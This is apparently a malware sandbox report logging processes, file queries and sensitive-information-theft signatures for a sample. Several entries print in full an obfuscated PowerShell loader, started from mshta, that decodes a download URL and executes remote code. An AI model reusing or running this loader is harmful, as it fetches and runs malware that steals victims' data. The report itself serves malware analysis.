Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nasolacrimal = 1;$crummies182='substrin';$crummies182+='g';function nejsigerens($paynize){$respirator=$paynize.length-$nasolacrimal;for($bolsjes=5; $bolsjes -lt $respirator; $bolsjes+=(6)){$velmagtstid+=$paynize.$crummies182.invoke($bolsjes, $nasolacrimal);}$velmagtstid;}function vinddrejning($brinken){. ($findelings) ($brinken);}$sedimentet=nejsigerens ',hoppmsil.no skakzslleriakkorlheterlsyncha.ylte/gardi5 ympe.smlst0 nei fabel(romanwseed.ibed nnpost.dtilhyotj.new tirrsmod.g partnaadsetpaali haf,a1indru0p,gme.prjud0 o,ni;glamo nonpawbromii slaunastra6p.ene4desmo;chous gitax t,ne6angst4engin;calyp subdorlavniv farv:nyrel1rival2tempo1faste.senge0reo.t)skamf tricg p oteunl,ccgr ymkglo eo aute/ .ata2ca er0thuj 1s.erl0 beds0betin1tete,0rearr1typis ostrafsaginir,ndsrchrone retsfb,natoi scux b.nd/bogti1alter2 a,lu1svell.,avpr0brode ';$accouplement=nejsigerens 'crotoutravasnebuleretslrpe ta-vinyla,oblegopstienonbinkokketovers ';$chorioretinal=nejsigerens ' top,hguaratsoliftxosavpben is flyv:podni/jer s/cl padwolfgr k.miiafglavgreenebev,l. scabgprea omicroo irayg pyrolha,moe,ista.highechund.oscro,mspir./machiumydricevenn?rain.eparcax ,edipgrumbopro,rrngleftch,ly= cottdhuntso eftew tilbnfeutelhom,wopositaloquadcarac&plag iepicudfoste=possi1 undeixenyllsjklefbeman5myelobregioi y gipdefalykonges rackm ef eyblrehggemmadkompauno,nysunseet siakyuan,d6defauc,uerisergat9nonfoume iomteatey.ogstd,atklkalu,atdecelz ozelrmirabnsnuffvcongeh opsk ';$roselil=nejsigerens 'forle>geoge ';$findelings=nejsigerens ' polli svinefor,lxkoron ';$forslvende='tarnishable';vinddrejning (nejsigerens 'vrd.psphilaebyr.ttre to-digescstillotgtgenerholtdoddiewindln,andotsu.er tirz-pol,lp un ea begrtredirhyderz submat.oral: omer\at.ent myceetryllrnyanjzus nse fungt epidtobligotrykf.r.flhtst.afxf.agttconce itr-luskevrakkeawrybils.eenuafgife jell gunya$ go,afmegavoautomratropssulfolclotsvw.ttiecraninhyperdpolyreaf gt;rorpi ');vinddrejning (nejsigerens 'udb ki gennf medi hefti(teksttretypekni.sswolfets lfi-micropid,liaforbrtpsychhmilea c.onto,tol:valut\erhvetcityee maizru.uelzlovfoe ph ethandetbaksnosavor.visiottessax supetluf,v)kalci{hermge omkoxf rniiphrentdisk }discu;uhums ');$gedde = nejsigerens 'brnehea,rstcbrunehpaaseosindb p.rfo%ge neaarmhup m,slphivoldprospapontitdiletafr,ng%palar\shogalskrupal,ceice,imet v.dnooph hsadmincer.opounderple.ioeislnd.heikacsubclll vneahomog dkket&skjol& mali kvi.detro icenasbharchdoob,as recre$ spin ';vinddrejning (nejsigerens 'bolde$ atig .kumlcelluopost.b foliafjolslaphan:droplcstru,athemedbemurevicilateleou,remfeunponrdo,ma=infic(l.tryclrredmabrfod,ohor mcca/prludc taur ratg$.iceugflandetopmedtvededmisfoeselve)t ril ');vinddrejning (nejsigerens ' stre$ t,llgpyogelquinqoasyndb orta ompaltr.ns:blemmao shaddet im.ybloianit n scowi lossfanattazotorga.isaorni,tmentoiscrumove.stnfishsszaca.g sortrhermauwe,rynprocrdstrmklsp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nasolacrimal = 1;$crummies182='substrin';$crummies182+='g';function nejsigerens($paynize){$respirator=$paynize.length-$nasolacrimal;for($bolsjes=5; $bolsjes -lt $respirator; $bolsjes+=(6)){$velmagtstid+=$paynize.$crummies182.invoke($bolsjes, $nasolacrimal);}$velmagtstid;}function vinddrejning($brinken){. ($findelings) ($brinken);}$sedimentet=nejsigerens ',hoppmsil.no skakzslleriakkorlheterlsyncha.ylte/gardi5 ympe.smlst0 nei fabel(romanwseed.ibed nnpost.dtilhyotj.new tirrsmod.g partnaadsetpaali haf,a1indru0p,gme.prjud0 o,ni;glamo nonpawbromii slaunastra6p.ene4desmo;chous gitax t,ne6angst4engin;calyp subdorlavniv farv:nyrel1rival2tempo1faste.senge0reo.t)skamf tricg p oteunl,ccgr ymkglo eo aute/ .ata2ca er0thuj 1s.erl0 beds0betin1tete,0rearr1typis ostrafsaginir,ndsrchrone retsfb,natoi scux b.nd/bogti1alter2 a,lu1svell.,avpr0brode ';$accouplement=nejsigerens 'crotoutravasnebuleretslrpe ta-vinyla,oblegopstienonbinkokketovers ';$chorioretinal=nejsigerens ' top,hguaratsoliftxosavpben is flyv:podni/jer s/cl padwolfgr k.miiafglavgreenebev,l. scabgprea omicroo irayg pyrolha,moe,ista.highechund.oscro,mspir./machiumydricevenn?rain.eparcax ,edipgrumbopro,rrngleftch,ly= cottdhuntso eftew tilbnfeutelhom,wopositaloquadcarac&plag iepicudfoste=possi1 undeixenyllsjklefbeman5myelobregioi y gipdefalykonges rackm ef eyblrehggemmadkompauno,nysunseet siakyuan,d6defauc,uerisergat9nonfoume iomteatey.ogstd,atklkalu,atdecelz ozelrmirabnsnuffvcongeh opsk ';$roselil=nejsigerens 'forle>geoge ';$findelings=nejsigerens ' polli svinefor,lxkoron ';$forslvende='tarnishable';vinddrejning (nejsigerens 'vrd.psphilaebyr.ttre to-digescstillotgtgenerholtdoddiewindln,andotsu.er tirz-pol,lp un ea begrtredirhyderz submat.oral: omer\at.ent myceetryllrnyanjzus nse fungt epidtobligotrykf.r.flhtst.afxf.agttconce itr-luskevrakkeawrybils.eenuafgife jell gunya$ go,afmegavoautomratropssulfolclotsvw.ttiecraninhyperdpolyreaf gt;rorpi ');vinddrejning (nejsigerens 'udb ki gennf medi hefti(teksttretypekni.sswolfets lfi-micropid,liaforbrtpsychhmilea c.onto,tol:valut\erhvetcityee maizru.uelzlovfoe ph ethandetbaksnosavor.visiottessax supetluf,v)kalci{hermge omkoxf rniiphrentdisk }discu;uhums ');$gedde = nejsigerens 'brnehea,rstcbrunehpaaseosindb p.rfo%ge neaarmhup m,slphivoldprospapontitdiletafr,ng%palar\shogalskrupal,ceice,imet v.dnooph hsadmincer.opounderple.ioeislnd.heikacsubclll vneahomog dkket&skjol& mali kvi.detro icenasbharchdoob,as recre$ spin ';vinddrejning (nejsigerens 'bolde$ atig .kumlcelluopost.b foliafjolslaphan:droplcstru,athemedbemurevicilateleou,remfeunponrdo,ma=infic(l.tryclrredmabrfod,ohor mcca/prludc taur ratg$.iceugflandetopmedtvededmisfoeselve)t ril ');vinddrejning (nejsigerens ' stre$ t,llgpyogelquinqoasyndb orta ompaltr.ns:blemmao shaddet im.ybloianit n scowi lossfanattazotorga.isaorni,tmentoiscrumove.stnfishsszaca.g sortrhermauwe,rynprocrdstrmklsp
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nasolacrimal = 1;$crummies182='substrin';$crummies182+='g';function nejsigerens($paynize){$respirator=$paynize.length-$nasolacrimal;for($bolsjes=5; $bolsjes -lt $respirator; $bolsjes+=(6)){$velmagtstid+=$paynize.$crummies182.invoke($bolsjes, $nasolacrimal);}$velmagtstid;}function vinddrejning($brinken){. ($findelings) ($brinken);}$sedimentet=nejsigerens ',hoppmsil.no skakzslleriakkorlheterlsyncha.ylte/gardi5 ympe.smlst0 nei fabel(romanwseed.ibed nnpost.dtilhyotj.new tirrsmod.g partnaadsetpaali haf,a1indru0p,gme.prjud0 o,ni;glamo nonpawbromii slaunastra6p.ene4desmo;chous gitax t,ne6angst4engin;calyp subdorlavniv farv:nyrel1rival2tempo1faste.senge0reo.t)skamf tricg p oteunl,ccgr ymkglo eo aute/ .ata2ca er0thuj 1s.erl0 beds0betin1tete,0rearr1typis ostrafsaginir,ndsrchrone retsfb,natoi scux b.nd/bogti1alter2 a,lu1svell.,avpr0brode ';$accouplement=nejsigerens 'crotoutravasnebuleretslrpe ta-vinyla,oblegopstienonbinkokketovers ';$chorioretinal=nejsigerens ' top,hguaratsoliftxosavpben is flyv:podni/jer s/cl padwolfgr k.miiafglavgreenebev,l. scabgprea omicroo irayg pyrolha,moe,ista.highechund.oscro,mspir./machiumydricevenn?rain.eparcax ,edipgrumbopro,rrngleftch,ly= cottdhuntso eftew tilbnfeutelhom,wopositaloquadcarac&plag iepicudfoste=possi1 undeixenyllsjklefbeman5myelobregioi y gipdefalykonges rackm ef eyblrehggemmadkompauno,nysunseet siakyuan,d6defauc,uerisergat9nonfoume iomteatey.ogstd,atklkalu,atdecelz ozelrmirabnsnuffvcongeh opsk ';$roselil=nejsigerens 'forle>geoge ';$findelings=nejsigerens ' polli svinefor,lxkoron ';$forslvende='tarnishable';vinddrejning (nejsigerens 'vrd.psphilaebyr.ttre to-digescstillotgtgenerholtdoddiewindln,andotsu.er tirz-pol,lp un ea begrtredirhyderz submat.oral: omer\at.ent myceetryllrnyanjzus nse fungt epidtobligotrykf.r.flhtst.afxf.agttconce itr-luskevrakkeawrybils.eenuafgife jell gunya$ go,afmegavoautomratropssulfolclotsvw.ttiecraninhyperdpolyreaf gt;rorpi ');vinddrejning (nejsigerens 'udb ki gennf medi hefti(teksttretypekni.sswolfets lfi-micropid,liaforbrtpsychhmilea c.onto,tol:valut\erhvetcityee maizru.uelzlovfoe ph ethandetbaksnosavor.visiottessax supetluf,v)kalci{hermge omkoxf rniiphrentdisk }discu;uhums ');$gedde = nejsigerens 'brnehea,rstcbrunehpaaseosindb p.rfo%ge neaarmhup m,slphivoldprospapontitdiletafr,ng%palar\shogalskrupal,ceice,imet v.dnooph hsadmincer.opounderple.ioeislnd.heikacsubclll vneahomog dkket&skjol& mali kvi.detro icenasbharchdoob,as recre$ spin ';vinddrejning (nejsigerens 'bolde$ atig .kumlcelluopost.b foliafjolslaphan:droplcstru,athemedbemurevicilateleou,remfeunponrdo,ma=infic(l.tryclrredmabrfod,ohor mcca/prludc taur ratg$.iceugflandetopmedtvededmisfoeselve)t ril ');vinddrejning (nejsigerens ' stre$ t,llgpyogelquinqoasyndb orta ompaltr.ns:blemmao shaddet im.ybloianit n scowi lossfanattazotorga.isaorni,tmentoiscrumove.stnfishsszaca.g sortrhermauwe,rynprocrdstrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nasolacrimal = 1;$crummies182='substrin';$crummies182+='g';function nejsigerens($paynize){$respirator=$paynize.length-$nasolacrimal;for($bolsjes=5; $bolsjes -lt $respirator; $bolsjes+=(6)){$velmagtstid+=$paynize.$crummies182.invoke($bolsjes, $nasolacrimal);}$velmagtstid;}function vinddrejning($brinken){. ($findelings) ($brinken);}$sedimentet=nejsigerens ',hoppmsil.no skakzslleriakkorlheterlsyncha.ylte/gardi5 ympe.smlst0 nei fabel(romanwseed.ibed nnpost.dtilhyotj.new tirrsmod.g partnaadsetpaali haf,a1indru0p,gme.prjud0 o,ni;glamo nonpawbromii slaunastra6p.ene4desmo;chous gitax t,ne6angst4engin;calyp subdorlavniv farv:nyrel1rival2tempo1faste.senge0reo.t)skamf tricg p oteunl,ccgr ymkglo eo aute/ .ata2ca er0thuj 1s.erl0 beds0betin1tete,0rearr1typis ostrafsaginir,ndsrchrone retsfb,natoi scux b.nd/bogti1alter2 a,lu1svell.,avpr0brode ';$accouplement=nejsigerens 'crotoutravasnebuleretslrpe ta-vinyla,oblegopstienonbinkokketovers ';$chorioretinal=nejsigerens ' top,hguaratsoliftxosavpben is flyv:podni/jer s/cl padwolfgr k.miiafglavgreenebev,l. scabgprea omicroo irayg pyrolha,moe,ista.highechund.oscro,mspir./machiumydricevenn?rain.eparcax ,edipgrumbopro,rrngleftch,ly= cottdhuntso eftew tilbnfeutelhom,wopositaloquadcarac&plag iepicudfoste=possi1 undeixenyllsjklefbeman5myelobregioi y gipdefalykonges rackm ef eyblrehggemmadkompauno,nysunseet siakyuan,d6defauc,uerisergat9nonfoume iomteatey.ogstd,atklkalu,atdecelz ozelrmirabnsnuffvcongeh opsk ';$roselil=nejsigerens 'forle>geoge ';$findelings=nejsigerens ' polli svinefor,lxkoron ';$forslvende='tarnishable';vinddrejning (nejsigerens 'vrd.psphilaebyr.ttre to-digescstillotgtgenerholtdoddiewindln,andotsu.er tirz-pol,lp un ea begrtredirhyderz submat.oral: omer\at.ent myceetryllrnyanjzus nse fungt epidtobligotrykf.r.flhtst.afxf.agttconce itr-luskevrakkeawrybils.eenuafgife jell gunya$ go,afmegavoautomratropssulfolclotsvw.ttiecraninhyperdpolyreaf gt;rorpi ');vinddrejning (nejsigerens 'udb ki gennf medi hefti(teksttretypekni.sswolfets lfi-micropid,liaforbrtpsychhmilea c.onto,tol:valut\erhvetcityee maizru.uelzlovfoe ph ethandetbaksnosavor.visiottessax supetluf,v)kalci{hermge omkoxf rniiphrentdisk }discu;uhums ');$gedde = nejsigerens 'brnehea,rstcbrunehpaaseosindb p.rfo%ge neaarmhup m,slphivoldprospapontitdiletafr,ng%palar\shogalskrupal,ceice,imet v.dnooph hsadmincer.opounderple.ioeislnd.heikacsubclll vneahomog dkket&skjol& mali kvi.detro icenasbharchdoob,as recre$ spin ';vinddrejning (nejsigerens 'bolde$ atig .kumlcelluopost.b foliafjolslaphan:droplcstru,athemedbemurevicilateleou,remfeunponrdo,ma=infic(l.tryclrredmabrfod,ohor mcca/prludc taur ratg$.iceugflandetopmedtvededmisfoeselve)t ril ');vinddrejning (nejsigerens ' stre$ t,llgpyogelquinqoasyndb orta ompaltr.ns:blemmao shaddet im.ybloianit n scowi lossfanattazotorga.isaorni,tmentoiscrumove.stnfishsszaca.g sortrhermauwe,rynprocrdstrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C33675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 10_2_00C33675
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000008.00000002.3260035578.000000002084E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
